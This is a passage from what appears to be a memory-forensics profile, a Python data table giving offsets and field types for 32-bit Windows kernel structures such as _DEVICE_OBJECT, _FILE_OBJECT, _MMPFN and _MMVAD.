'MinorFunction' : [ 0x1, ['unsigned char']],
'Flags' : [ 0x2, ['unsigned char']],
'Control' : [ 0x3, ['unsigned char']],
'Parameters' : [ 0x4, ['__unnamed_132a']],
'DeviceObject' : [ 0x14, ['pointer', ['_DEVICE_OBJECT']]],
'FileObject' : [ 0x18, ['pointer', ['_FILE_OBJECT']]],
'CompletionRoutine' : [ 0x1c, ['pointer', ['void']]],
'Context' : [ 0x20, ['pointer', ['void']]],
} ],
'__unnamed_1340' : [ 0x28, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Wcb' : [ 0x0, ['_WAIT_CONTEXT_BLOCK']],
} ],
'_DEVICE_OBJECT' : [ 0xb8, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['unsigned short']],
'ReferenceCount' : [ 0x4, ['long']],
'DriverObject' : [ 0x8, ['pointer', ['_DRIVER_OBJECT']]],
'NextDevice' : [ 0xc, ['pointer', ['_DEVICE_OBJECT']]],
'AttachedDevice' : [ 0x10, ['pointer', ['_DEVICE_OBJECT']]],
'CurrentIrp' : [ 0x14, ['pointer', ['_IRP']]],
'Timer' : [ 0x18, ['pointer', ['_IO_TIMER']]],
'Flags' : [ 0x1c, ['unsigned long']],
'Characteristics' : [ 0x20, ['unsigned long']],
'Vpb' : [ 0x24, ['pointer', ['_VPB']]],
'DeviceExtension' : [ 0x28, ['pointer', ['void']]],
'DeviceType' : [ 0x2c, ['unsigned long']],
'StackSize' : [ 0x30, ['unsigned char']],
'Queue' : [ 0x34, ['__unnamed_1340']],
'AlignmentRequirement' : [ 0x5c, ['unsigned long']],
'DeviceQueue' : [ 0x60, ['_KDEVICE_QUEUE']],
'Dpc' : [ 0x74, ['_KDPC']],
'ActiveThreadCount' : [ 0x94, ['unsigned long']],
'SecurityDescriptor' : [ 0x98, ['pointer', ['void']]],
'DeviceLock' : [ 0x9c, ['_KEVENT']],
'SectorSize' : [ 0xac, ['unsigned short']],
'Spare1' : [ 0xae, ['unsigned short']],
'DeviceObjectExtension' : [ 0xb0, ['pointer', ['_DEVOBJ_EXTENSION']]],
'Reserved' : [ 0xb4, ['pointer', ['void']]],
} ],
'_KDPC' : [ 0x20, {
'Type' : [ 0x0, ['unsigned char']],
'Importance' : [ 0x1, ['unsigned char']],
'Number' : [ 0x2, ['unsigned short']],
'DpcListEntry' : [ 0x4, ['_LIST_ENTRY']],
'DeferredRoutine' : [ 0xc, ['pointer', ['void']]],
'DeferredContext' : [ 0x10, ['pointer', ['void']]],
'SystemArgument1' : [ 0x14, ['pointer', ['void']]],
'SystemArgument2' : [ 0x18, ['pointer', ['void']]],
'DpcData' : [ 0x1c, ['pointer', ['void']]],
} ],
'_IO_DRIVER_CREATE_CONTEXT' : [ 0x10, {
'Size' : [ 0x0, ['short']],
'ExtraCreateParameter' : [ 0x4, ['pointer', ['_ECP_LIST']]],
'DeviceObjectHint' : [ 0x8, ['pointer', ['void']]],
'TxnParameters' : [ 0xc, ['pointer', ['_TXN_PARAMETER_BLOCK']]],
} ],
'_IO_PRIORITY_INFO' : [ 0x10, {
'Size' : [ 0x0, ['unsigned long']],
'ThreadPriority' : [ 0x4, ['unsigned long']],
'PagePriority' : [ 0x8, ['unsigned long']],
'IoPriority' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'IoPriorityVeryLow', 1: 'IoPriorityLow', 2: 'IoPriorityNormal', 3: 'IoPriorityHigh', 4: 'IoPriorityCritical', 5: 'MaxIoPriorityTypes'})]],
} ],
'_OBJECT_ATTRIBUTES' : [ 0x18, {
'Length' : [ 0x0, ['unsigned long']],
'RootDirectory' : [ 0x4, ['pointer', ['void']]],
'ObjectName' : [ 0x8, ['pointer', ['_UNICODE_STRING']]],
'Attributes' : [ 0xc, ['unsigned long']],
'SecurityDescriptor' : [ 0x10, ['pointer', ['void']]],
'SecurityQualityOfService' : [ 0x14, ['pointer', ['void']]],
} ],
'_OBJECT_HANDLE_INFORMATION' : [ 0x8, {
'HandleAttributes' : [ 0x0, ['unsigned long']],
'GrantedAccess' : [ 0x4, ['unsigned long']],
} ],
'_EVENT_DATA_DESCRIPTOR' : [ 0x10, {
'Ptr' : [ 0x0, ['unsigned long long']],
'Size' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'_EVENT_DESCRIPTOR' : [ 0x10, {
'Id' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned char']],
'Channel' : [ 0x3, ['unsigned char']],
'Level' : [ 0x4, ['unsigned char']],
'Opcode' : [ 0x5, ['unsigned char']],
'Task' : [ 0x6, ['unsigned short']],
'Keyword' : [ 0x8, ['unsigned long long']],
} ],
'_PERFINFO_GROUPMASK' : [ 0x20, {
'Masks' : [ 0x0, ['array', 8, ['unsigned long']]],
} ],
'_FILE_OBJECT' : [ 0x80, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'Vpb' : [ 0x8, ['pointer', ['_VPB']]],
'FsContext' : [ 0xc, ['pointer', ['void']]],
'FsContext2' : [ 0x10, ['pointer', ['void']]],
'SectionObjectPointer' : [ 0x14, ['pointer', ['_SECTION_OBJECT_POINTERS']]],
'PrivateCacheMap' : [ 0x18, ['pointer', ['void']]],
'FinalStatus' : [ 0x1c, ['long']],
'RelatedFileObject' : [ 0x20, ['pointer', ['_FILE_OBJECT']]],
'LockOperation' : [ 0x24, ['unsigned char']],
'DeletePending' : [ 0x25, ['unsigned char']],
'ReadAccess' : [ 0x26, ['unsigned char']],
'WriteAccess' : [ 0x27, ['unsigned char']],
'DeleteAccess' : [ 0x28, ['unsigned char']],
'SharedRead' : [ 0x29, ['unsigned char']],
'SharedWrite' : [ 0x2a, ['unsigned char']],
'SharedDelete' : [ 0x2b, ['unsigned char']],
'Flags' : [ 0x2c, ['unsigned long']],
'FileName' : [ 0x30, ['_UNICODE_STRING']],
'CurrentByteOffset' : [ 0x38, ['_LARGE_INTEGER']],
'Waiters' : [ 0x40, ['unsigned long']],
'Busy' : [ 0x44, ['unsigned long']],
'LastLock' : [ 0x48, ['pointer', ['void']]],
'Lock' : [ 0x4c, ['_KEVENT']],
'Event' : [ 0x5c, ['_KEVENT']],
'CompletionContext' : [ 0x6c, ['pointer', ['_IO_COMPLETION_CONTEXT']]],
'IrpListLock' : [ 0x70, ['unsigned long']],
'IrpList' : [ 0x74, ['_LIST_ENTRY']],
'FileObjectExtension' : [ 0x7c, ['pointer', ['void']]],
} ],
'_EX_RUNDOWN_REF' : [ 0x4, {
'Count' : [ 0x0, ['unsigned long']],
'Ptr' : [ 0x0, ['pointer', ['void']]],
} ],
'_MM_PAGE_ACCESS_INFO_HEADER' : [ 0x38, {
'Link' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'MmPteAccessType', 1: 'MmCcReadAheadType', 2: 'MmPfnRepurposeType', 3: 'MmMaximumPageAccessType'})]],
'EmptySequenceNumber' : [ 0x8, ['unsigned long']],
'CurrentFileIndex' : [ 0x8, ['unsigned long']],
'CreateTime' : [ 0x10, ['unsigned long long']],
'EmptyTime' : [ 0x18, ['unsigned long long']],
'TempEntry' : [ 0x18, ['pointer', ['_MM_PAGE_ACCESS_INFO']]],
'PageEntry' : [ 0x20, ['pointer', ['_MM_PAGE_ACCESS_INFO']]],
'FileEntry' : [ 0x24, ['pointer', ['unsigned long']]],
'FirstFileEntry' : [ 0x28, ['pointer', ['unsigned long']]],
'Process' : [ 0x2c, ['pointer', ['_EPROCESS']]],
'SessionId' : [ 0x30, ['unsigned long']],
'PageFrameEntry' : [ 0x20, ['pointer', ['unsigned long']]],
'LastPageFrameEntry' : [ 0x24, ['pointer', ['unsigned long']]],
} ],
'_WHEA_ERROR_PACKET_V2' : [ 0x50, {
'Signature' : [ 0x0, ['unsigned long']],
'Version' : [ 0x4, ['unsigned long']],
'Length' : [ 0x8, ['unsigned long']],
'Flags' : [ 0xc, ['_WHEA_ERROR_PACKET_FLAGS']],
'ErrorType' : [ 0x10, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrTypeProcessor', 1: 'WheaErrTypeMemory', 2: 'WheaErrTypePCIExpress', 3: 'WheaErrTypeNMI', 4: 'WheaErrTypePCIXBus', 5: 'WheaErrTypePCIXDevice', 6: 'WheaErrTypeGeneric'})]],
'ErrorSeverity' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSevRecoverable', 1: 'WheaErrSevFatal', 2: 'WheaErrSevCorrected', 3: 'WheaErrSevInformational'})]],
'ErrorSourceId' : [ 0x18, ['unsigned long']],
'ErrorSourceType' : [ 0x1c, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSrcTypeMCE', 1: 'WheaErrSrcTypeCMC', 2: 'WheaErrSrcTypeCPE', 3: 'WheaErrSrcTypeNMI', 4: 'WheaErrSrcTypePCIe', 5: 'WheaErrSrcTypeGeneric', 6: 'WheaErrSrcTypeINIT', 7: 'WheaErrSrcTypeBOOT', 8: 'WheaErrSrcTypeSCIGeneric', 9: 'WheaErrSrcTypeIPFMCA', 10: 'WheaErrSrcTypeIPFCMC', 11: 'WheaErrSrcTypeIPFCPE', 12: 'WheaErrSrcTypeMax'})]],
'NotifyType' : [ 0x20, ['_GUID']],
'Context' : [ 0x30, ['unsigned long long']],
'DataFormat' : [ 0x38, ['Enumeration', dict(target = 'long', choices = {0: 'WheaDataFormatIPFSalRecord', 1: 'WheaDataFormatXPFMCA', 2: 'WheaDataFormatMemory', 3: 'WheaDataFormatPCIExpress', 4: 'WheaDataFormatNMIPort', 5: 'WheaDataFormatPCIXBus', 6: 'WheaDataFormatPCIXDevice', 7: 'WheaDataFormatGeneric', 8: 'WheaDataFormatMax'})]],
'Reserved1' : [ 0x3c, ['unsigned long']],
'DataOffset' : [ 0x40, ['unsigned long']],
'DataLength' : [ 0x44, ['unsigned long']],
'PshedDataOffset' : [ 0x48, ['unsigned long']],
'PshedDataLength' : [ 0x4c, ['unsigned long']],
} ],
'_WHEA_ERROR_RECORD' : [ 0xc8, {
'Header' : [ 0x0, ['_WHEA_ERROR_RECORD_HEADER']],
'SectionDescriptor' : [ 0x80, ['array', 1, ['_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR']]],
} ],
'_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR' : [ 0x48, {
'SectionOffset' : [ 0x0, ['unsigned long']],
'SectionLength' : [ 0x4, ['unsigned long']],
'Revision' : [ 0x8, ['_WHEA_REVISION']],
'ValidBits' : [ 0xa, ['_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS']],
'Reserved' : [ 0xb, ['unsigned char']],
'Flags' : [ 0xc, ['_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS']],
'SectionType' : [ 0x10, ['_GUID']],
'FRUId' : [ 0x20, ['_GUID']],
'SectionSeverity' : [ 0x30, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSevRecoverable', 1: 'WheaErrSevFatal', 2: 'WheaErrSevCorrected', 3: 'WheaErrSevInformational'})]],
'FRUText' : [ 0x34, ['array', 20, ['unsigned char']]],
} ],
'_GUID' : [ 0x10, {
'Data1' : [ 0x0, ['unsigned long']],
'Data2' : [ 0x4, ['unsigned short']],
'Data3' : [ 0x6, ['unsigned short']],
'Data4' : [ 0x8, ['array', 8, ['unsigned char']]],
} ],
'_FSRTL_ADVANCED_FCB_HEADER' : [ 0x40, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteSize' : [ 0x2, ['short']],
'Flags' : [ 0x4, ['unsigned char']],
'IsFastIoPossible' : [ 0x5, ['unsigned char']],
'Flags2' : [ 0x6, ['unsigned char']],
'Reserved' : [ 0x7, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned char')]],
'Version' : [ 0x7, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'Resource' : [ 0x8, ['pointer', ['_ERESOURCE']]],
'PagingIoResource' : [ 0xc, ['pointer', ['_ERESOURCE']]],
'AllocationSize' : [ 0x10, ['_LARGE_INTEGER']],
'FileSize' : [ 0x18, ['_LARGE_INTEGER']],
'ValidDataLength' : [ 0x20, ['_LARGE_INTEGER']],
'FastMutex' : [ 0x28, ['pointer', ['_FAST_MUTEX']]],
'FilterContexts' : [ 0x2c, ['_LIST_ENTRY']],
'PushLock' : [ 0x34, ['_EX_PUSH_LOCK']],
'FileContextSupportPointer' : [ 0x38, ['pointer', ['pointer', ['void']]]],
} ],
'_iobuf' : [ 0x20, {
'_ptr' : [ 0x0, ['pointer', ['unsigned char']]],
'_cnt' : [ 0x4, ['long']],
'_base' : [ 0x8, ['pointer', ['unsigned char']]],
'_flag' : [ 0xc, ['long']],
'_file' : [ 0x10, ['long']],
'_charbuf' : [ 0x14, ['long']],
'_bufsiz' : [ 0x18, ['long']],
'_tmpfname' : [ 0x1c, ['pointer', ['unsigned char']]],
} ],
'__unnamed_14ad' : [ 0x4, {
'Long' : [ 0x0, ['unsigned long']],
'VolatileLong' : [ 0x0, ['unsigned long']],
'Flush' : [ 0x0, ['_HARDWARE_PTE']],
'Hard' : [ 0x0, ['_MMPTE_HARDWARE']],
'Proto' : [ 0x0, ['_MMPTE_PROTOTYPE']],
'Soft' : [ 0x0, ['_MMPTE_SOFTWARE']],
'TimeStamp' : [ 0x0, ['_MMPTE_TIMESTAMP']],
'Trans' : [ 0x0, ['_MMPTE_TRANSITION']],
'Subsect' : [ 0x0, ['_MMPTE_SUBSECTION']],
'List' : [ 0x0, ['_MMPTE_LIST']],
} ],
'_MMPTE' : [ 0x4, {
'u' : [ 0x0, ['__unnamed_14ad']],
} ],
'__unnamed_14be' : [ 0xc, {
'I386' : [ 0x0, ['_I386_LOADER_BLOCK']],
'Ia64' : [ 0x0, ['_IA64_LOADER_BLOCK']],
} ],
'_LOADER_PARAMETER_BLOCK' : [ 0x88, {
'OsMajorVersion' : [ 0x0, ['unsigned long']],
'OsMinorVersion' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
'LoadOrderListHead' : [ 0x10, ['_LIST_ENTRY']],
'MemoryDescriptorListHead' : [ 0x18, ['_LIST_ENTRY']],
'BootDriverListHead' : [ 0x20, ['_LIST_ENTRY']],
'KernelStack' : [ 0x28, ['unsigned long']],
'Prcb' : [ 0x2c, ['unsigned long']],
'Process' : [ 0x30, ['unsigned long']],
'Thread' : [ 0x34, ['unsigned long']],
'RegistryLength' : [ 0x38, ['unsigned long']],
'RegistryBase' : [ 0x3c, ['pointer', ['void']]],
'ConfigurationRoot' : [ 0x40, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'ArcBootDeviceName' : [ 0x44, ['pointer', ['unsigned char']]],
'ArcHalDeviceName' : [ 0x48, ['pointer', ['unsigned char']]],
'NtBootPathName' : [ 0x4c, ['pointer', ['unsigned char']]],
'NtHalPathName' : [ 0x50, ['pointer', ['unsigned char']]],
'LoadOptions' : [ 0x54, ['pointer', ['unsigned char']]],
'NlsData' : [ 0x58, ['pointer', ['_NLS_DATA_BLOCK']]],
'ArcDiskInformation' : [ 0x5c, ['pointer', ['_ARC_DISK_INFORMATION']]],
'OemFontFile' : [ 0x60, ['pointer', ['void']]],
'Extension' : [ 0x64, ['pointer', ['_LOADER_PARAMETER_EXTENSION']]],
'u' : [ 0x68, ['__unnamed_14be']],
'FirmwareInformation' : [ 0x74, ['_FIRMWARE_INFORMATION_LOADER_BLOCK']],
} ],
'_KLOCK_QUEUE_HANDLE' : [ 0xc, {
'LockQueue' : [ 0x0, ['_KSPIN_LOCK_QUEUE']],
'OldIrql' : [ 0x8, ['unsigned char']],
} ],
'_MMPFNLIST' : [ 0x14, {
'Total' : [ 0x0, ['unsigned long']],
'ListName' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'ZeroedPageList', 1: 'FreePageList', 2: 'StandbyPageList', 3: 'ModifiedPageList', 4: 'ModifiedNoWritePageList', 5: 'BadPageList', 6: 'ActiveAndValid', 7: 'TransitionPage'})]],
'Flink' : [ 0x8, ['unsigned long']],
'Blink' : [ 0xc, ['unsigned long']],
'Lock' : [ 0x10, ['unsigned long']],
} ],
'__unnamed_14ef' : [ 0x4, {
'Flink' : [ 0x0, ['unsigned long']],
'WsIndex' : [ 0x0, ['unsigned long']],
'Event' : [ 0x0, ['pointer', ['_KEVENT']]],
'Next' : [ 0x0, ['pointer', ['void']]],
'VolatileNext' : [ 0x0, ['pointer', ['void']]],
'KernelStackOwner' : [ 0x0, ['pointer', ['_KTHREAD']]],
'NextStackPfn' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
} ],
'__unnamed_14f1' : [ 0x4, {
'Blink' : [ 0x0, ['unsigned long']],
'ImageProtoPte' : [ 0x0, ['pointer', ['_MMPTE']]],
'ShareCount' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_14f4' : [ 0x4, {
'ReferenceCount' : [ 0x0, ['unsigned short']],
'VolatileReferenceCount' : [ 0x0, ['short']],
'ShortFlags' : [ 0x2, ['unsigned short']],
} ],
'__unnamed_14f6' : [ 0x4, {
'ReferenceCount' : [ 0x0, ['unsigned short']],
'e1' : [ 0x2, ['_MMPFNENTRY']],
'e2' : [ 0x0, ['__unnamed_14f4']],
} ],
'__unnamed_14fb' : [ 0x4, {
'PteFrame' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 25, native_type='unsigned long')]],
'PfnImageVerified' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'AweAllocation' : [ 0x0, ['BitField', dict(start_bit = 26, end_bit = 27, native_type='unsigned long')]],
'PrototypePte' : [ 0x0, ['BitField', dict(start_bit = 27, end_bit = 28, native_type='unsigned long')]],
'PageColor' : [ 0x0, ['BitField', dict(start_bit = 28, end_bit = 32, native_type='unsigned long')]],
} ],
'_MMPFN' : [ 0x18, {
'u1' : [ 0x0, ['__unnamed_14ef']],
'u2' : [ 0x4, ['__unnamed_14f1']],
'PteAddress' : [ 0x8, ['pointer', ['_MMPTE']]],
'VolatilePteAddress' : [ 0x8, ['pointer', ['void']]],
'Lock' : [ 0x8, ['long']],
'PteLong' : [ 0x8, ['unsigned long']],
'u3' : [ 0xc, ['__unnamed_14f6']],
'OriginalPte' : [ 0x10, ['_MMPTE']],
'AweReferenceCount' : [ 0x10, ['long']],
'u4' : [ 0x14, ['__unnamed_14fb']],
} ],
'_MI_COLOR_BASE' : [ 0x8, {
'ColorPointer' : [ 0x0, ['pointer', ['unsigned short']]],
'ColorMask' : [ 0x4, ['unsigned short']],
'ColorNode' : [ 0x6, ['unsigned short']],
} ],
'_MMSUPPORT' : [ 0x6c, {
'WorkingSetMutex' : [ 0x0, ['_EX_PUSH_LOCK']],
'ExitGate' : [ 0x4, ['pointer', ['_KGATE']]],
'AccessLog' : [ 0x8, ['pointer', ['void']]],
'WorkingSetExpansionLinks' : [ 0xc, ['_LIST_ENTRY']],
'AgeDistribution' : [ 0x14, ['array', 7, ['unsigned long']]],
'MinimumWorkingSetSize' : [ 0x30, ['unsigned long']],
'WorkingSetSize' : [ 0x34, ['unsigned long']],
'WorkingSetPrivateSize' : [ 0x38, ['unsigned long']],
'MaximumWorkingSetSize' : [ 0x3c, ['unsigned long']],
'ChargedWslePages' : [ 0x40, ['unsigned long']],
'ActualWslePages' : [ 0x44, ['unsigned long']],
'WorkingSetSizeOverhead' : [ 0x48, ['unsigned long']],
'PeakWorkingSetSize' : [ 0x4c, ['unsigned long']],
'HardFaultCount' : [ 0x50, ['unsigned long']],
'VmWorkingSetList' : [ 0x54, ['pointer', ['_MMWSL']]],
'NextPageColor' : [ 0x58, ['unsigned short']],
'LastTrimStamp' : [ 0x5a, ['unsigned short']],
'PageFaultCount' : [ 0x5c, ['unsigned long']],
'RepurposeCount' : [ 0x60, ['unsigned long']],
'Spare' : [ 0x64, ['array', 1, ['unsigned long']]],
'Flags' : [ 0x68, ['_MMSUPPORT_FLAGS']],
} ],
'_MMWSL' : [ 0x6a8, {
'FirstFree' : [ 0x0, ['unsigned long']],
'FirstDynamic' : [ 0x4, ['unsigned long']],
'LastEntry' : [ 0x8, ['unsigned long']],
'NextSlot' : [ 0xc, ['unsigned long']],
'Wsle' : [ 0x10, ['pointer', ['_MMWSLE']]],
'LowestPagableAddress' : [ 0x14, ['pointer', ['void']]],
'LastInitializedWsle' : [ 0x18, ['unsigned long']],
'NextAgingSlot' : [ 0x1c, ['unsigned long']],
'NumberOfCommittedPageTables' : [ 0x20, ['unsigned long']],
'VadBitMapHint' : [ 0x24, ['unsigned long']],
'NonDirectCount' : [ 0x28, ['unsigned long']],
'LastVadBit' : [ 0x2c, ['unsigned long']],
'MaximumLastVadBit' : [ 0x30, ['unsigned long']],
'LastAllocationSizeHint' : [ 0x34, ['unsigned long']],
'LastAllocationSize' : [ 0x38, ['unsigned long']],
'NonDirectHash' : [ 0x3c, ['pointer', ['_MMWSLE_NONDIRECT_HASH']]],
'HashTableStart' : [ 0x40, ['pointer', ['_MMWSLE_HASH']]],
'HighestPermittedHashAddress' : [ 0x44, ['pointer', ['_MMWSLE_HASH']]],
'UsedPageTableEntries' : [ 0x48, ['array', 768, ['unsigned short']]],
'CommittedPageTables' : [ 0x648, ['array', 24, ['unsigned long']]],
} ],
'__unnamed_152b' : [ 0x4, {
'VirtualAddress' : [ 0x0, ['pointer', ['void']]],
'Long' : [ 0x0, ['unsigned long']],
'e1' : [ 0x0, ['_MMWSLENTRY']],
'e2' : [ 0x0, ['_MMWSLE_FREE_ENTRY']],
} ],
'_MMWSLE' : [ 0x4, {
'u1' : [ 0x0, ['__unnamed_152b']],
} ],
'__unnamed_153a' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x0, ['_MMSECTION_FLAGS']],
} ],
'__unnamed_1544' : [ 0xc, {
'NumberOfSystemCacheViews' : [ 0x0, ['unsigned long']],
'ImageRelocationStartBit' : [ 0x0, ['unsigned long']],
'WritableUserReferences' : [ 0x4, ['long']],
'ImageRelocationSizeIn64k' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'Unused' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 30, native_type='unsigned long')]],
'BitMap64' : [ 0x4, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'ImageActive' : [ 0x4, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
'SubsectionRoot' : [ 0x8, ['pointer', ['_MM_SUBSECTION_AVL_TABLE']]],
'SeImageStub' : [ 0x8, ['pointer', ['_MI_IMAGE_SECURITY_REFERENCE']]],
} ],
'__unnamed_1546' : [ 0xc, {
'e2' : [ 0x0, ['__unnamed_1544']],
} ],
'_CONTROL_AREA' : [ 0x50, {
'Segment' : [ 0x0, ['pointer', ['_SEGMENT']]],
'DereferenceList' : [ 0x4, ['_LIST_ENTRY']],
'NumberOfSectionReferences' : [ 0xc, ['unsigned long']],
'NumberOfPfnReferences' : [ 0x10, ['unsigned long']],
'NumberOfMappedViews' : [ 0x14, ['unsigned long']],
'NumberOfUserReferences' : [ 0x18, ['unsigned long']],
'u' : [ 0x1c, ['__unnamed_153a']],
'FlushInProgressCount' : [ 0x20, ['unsigned long']],
'FilePointer' : [ 0x24, ['_EX_FAST_REF']],
'ControlAreaLock' : [ 0x28, ['long']],
'ModifiedWriteCount' : [ 0x2c, ['unsigned long']],
'StartingFrame' : [ 0x2c, ['unsigned long']],
'WaitingForDeletion' : [ 0x30, ['pointer', ['_MI_SECTION_CREATION_GATE']]],
'u2' : [ 0x34, ['__unnamed_1546']],
'LockedPages' : [ 0x40, ['long long']],
'ViewList' : [ 0x48, ['_LIST_ENTRY']],
} ],
'_MM_STORE_KEY' : [ 0x4, {
'KeyLow' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 28, native_type='unsigned long')]],
'KeyHigh' : [ 0x0, ['BitField', dict(start_bit = 28, end_bit = 32, native_type='unsigned long')]],
'EntireKey' : [ 0x0, ['unsigned long']],
} ],
'_MMPAGING_FILE' : [ 0x50, {
'Size' : [ 0x0, ['unsigned long']],
'MaximumSize' : [ 0x4, ['unsigned long']],
'MinimumSize' : [ 0x8, ['unsigned long']],
'FreeSpace' : [ 0xc, ['unsigned long']],
'PeakUsage' : [ 0x10, ['unsigned long']],
'HighestPage' : [ 0x14, ['unsigned long']],
'File' : [ 0x18, ['pointer', ['_FILE_OBJECT']]],
'Entry' : [ 0x1c, ['array', 2, ['pointer', ['_MMMOD_WRITER_MDL_ENTRY']]]],
'PageFileName' : [ 0x24, ['_UNICODE_STRING']],
'Bitmap' : [ 0x2c, ['pointer', ['_RTL_BITMAP']]],
'EvictStoreBitmap' : [ 0x30, ['pointer', ['_RTL_BITMAP']]],
'BitmapHint' : [ 0x34, ['unsigned long']],
'LastAllocationSize' : [ 0x38, ['unsigned long']],
'ToBeEvictedCount' : [ 0x3c, ['unsigned long']],
'PageFileNumber' : [ 0x40, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned short')]],
'BootPartition' : [ 0x40, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'Spare0' : [ 0x40, ['BitField', dict(start_bit = 5, end_bit = 16, native_type='unsigned short')]],
'AdriftMdls' : [ 0x42, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'Spare1' : [ 0x42, ['BitField', dict(start_bit = 1, end_bit = 16, native_type='unsigned short')]],
'FileHandle' : [ 0x44, ['pointer', ['void']]],
'Lock' : [ 0x48, ['unsigned long']],
'LockOwner' : [ 0x4c, ['pointer', ['_ETHREAD']]],
} ],
'_RTL_BITMAP' : [ 0x8, {
'SizeOfBitMap' : [ 0x0, ['unsigned long']],
'Buffer' : [ 0x4, ['pointer', ['unsigned long']]],
} ],
'_MM_AVL_TABLE' : [ 0x20, {
'BalancedRoot' : [ 0x0, ['_MMADDRESS_NODE']],
'DepthOfTree' : [ 0x14, ['BitField', dict(start_bit = 0, end_bit = 5, native_type='unsigned long')]],
'Unused' : [ 0x14, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned long')]],
'NumberGenericTableElements' : [ 0x14, ['BitField', dict(start_bit = 8, end_bit = 32, native_type='unsigned long')]],
'NodeHint' : [ 0x18, ['pointer', ['void']]],
'NodeFreeHint' : [ 0x1c, ['pointer', ['void']]],
} ],
'__unnamed_1580' : [ 0x4, {
'Balance' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='long')]],
'Parent' : [ 0x0, ['pointer', ['_MMVAD']]],
} ],
'__unnamed_1583' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'VadFlags' : [ 0x0, ['_MMVAD_FLAGS']],
} ],
'__unnamed_1586' : [ 0x4, {
'LongFlags3' : [ 0x0, ['unsigned long']],
'VadFlags3' : [ 0x0, ['_MMVAD_FLAGS3']],
} ],
'_MMVAD_SHORT' : [ 0x20, {
'u1' : [ 0x0, ['__unnamed_1580']],
'LeftChild' : [ 0x4, ['pointer', ['_MMVAD']]],
'RightChild' : [ 0x8, ['pointer', ['_MMVAD']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
'u' : [ 0x14, ['__unnamed_1583']],
'PushLock' : [ 0x18, ['_EX_PUSH_LOCK']],
'u5' : [ 0x1c, ['__unnamed_1586']],
} ],
'__unnamed_158e' : [ 0x4, {
'Balance' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='long')]],
'Parent' : [ 0x0, ['pointer', ['_MMADDRESS_NODE']]],
} ],
'_MMADDRESS_NODE' : [ 0x14, {
'u1' : [ 0x0, ['__unnamed_158e']],
'LeftChild' : [ 0x4, ['pointer', ['_MMADDRESS_NODE']]],
'RightChild' : [ 0x8, ['pointer', ['_MMADDRESS_NODE']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
} ],
'__unnamed_1593' : [ 0x4, {
'LongFlags2' : [ 0x0, ['unsigned long']],
'VadFlags2' : [ 0x0, ['_MMVAD_FLAGS2']],
} ],
'_MMVAD' : [ 0x3c, {
'u1' : [ 0x0, ['__unnamed_1580']],
'LeftChild' : [ 0x4, ['pointer', ['_MMVAD']]],
'RightChild' : [ 0x8, ['pointer', ['_MMVAD']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
'u' : [ 0x14, ['__unnamed_1583']],
'PushLock' : [ 0x18, ['_EX_PUSH_LOCK']],
'u5' : [ 0x1c, ['__unnamed_1586']],
'u2' : [ 0x20, ['__unnamed_1593']],
'Subsection' : [ 0x24, ['pointer', ['_SUBSECTION']]],
'MappedSubsection' : [ 0x24, ['pointer', ['_MSUBSECTION']]],
'FirstPrototypePte' : [ 0x28, ['pointer', ['_MMPTE']]],
'LastContiguousPte' : [ 0x2c, ['pointer', ['_MMPTE']]],
'ViewLinks' : [ 0x30, ['_LIST_ENTRY']],
'VadsProcess' : [ 0x38, ['pointer', ['_EPROCESS']]],
} ],
'__unnamed_159e' : [ 0x20, {
'Mdl' : [ 0x0, ['_MDL']],
'Page' : [ 0x1c, ['array', 1, ['unsigned long']]],
} ],
'_MI_PAGEFILE_TRACES' : [ 0x40, {
'Status' : [ 0x0, ['long']],
'Priority' : [ 0x4, ['unsigned char']],
'IrpPriority' : [ 0x5, ['unsigned char']],
